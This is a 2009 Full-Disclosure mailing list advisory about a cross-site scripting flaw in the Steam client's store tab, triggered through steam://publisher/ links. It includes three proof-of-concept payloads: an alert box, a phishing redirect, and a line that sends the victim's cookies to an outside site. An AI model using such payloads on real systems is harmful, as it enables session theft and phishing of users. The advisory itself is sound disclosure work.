[Full-disclosure] STEAM (Valve) - Phishing and Cross-site Scripting in internal browser

From: Gabriel Lima <gabriel_at_nospam>
Date: Tue May 19 2009 - 22:25:40 GMT
To: full-disclosure@lists.grok.org.uk

APP: STEAM - Valve Software =
- STEAM < http://www.steampowered.com >
- Valve Software < http://www.valvesoftware.com >
- Vulnerability Discovery: Gabriel Lima < gabriel (at) falandodeseguranca.com >
- http://www.falandodeseguranca.com (in portuguese)
- Demo screenshot: http://www.falandodeseguranca.com/wp-content/uploads/2009/05/steam-xss.jpg
- Description -

It's possible to input JavaScript\HTML in Steam Store tab (inside Steam App.), using the Steam
Protocol (steam://) which can be exploited in a html page.

"steam://publisher/<name> Loads the specified publisher catalogue in the Store. Type the
publisher's name in lowercase, e.g. activision or valve."

When using a publisher name that doesn't exist, Steam Store sends the value to the search
system, which is vulnerable to XSS.

Store tab in Steam doesn't show the URL. Phishing is possible just redirecting the victim to
the fake site.

VALVE was contacted in May 10, but they didn't reply anything (May 18).

Works in Internet Explorer.
Tested under Windows XP SP 3 and Windows Vista.

Proof of Concept -

[1] Alert with text xss
steam://publisher/<img%20src=a%20onerror=alert('xss')>

[2] PHISING (in this example, it redirects to falandodeseguranca.com ) steam://publisher/<img%20src=a%20
onerror=document.location.href='http'+String.fromCharCode(58,47,47)+' falandodeseguranca.com';>

[3] Getting cookies:
steam://publisher/<img%20src=a%20
onerror=document.location.href='http'+String.fromCharCode(58,47,47)+' falandodeseguranca.com'+String.fromCharCode(47)+document.cookie;>

More Information -
The Paper showing how it works, a post with screenshots and a video could be found here:

http://www.falandodeseguranca.com/2009/05/vulnerabilidade-no-steam-phishing-e-xss-na-steam-store/(In portuguese)
More information: http://www.falandodeseguranca.com

Contact me: gabriel <at> falandodeseguranca.com

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

This message: [ Message body ]
Next message: saphex: "[Full-disclosure] FFSpy, a firefox malware PoC"
Previous message: Gabriel Lima: "[Full-disclosure] STEAM (Valve) - Phishing and Cross-site Scripting in internal browser"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ]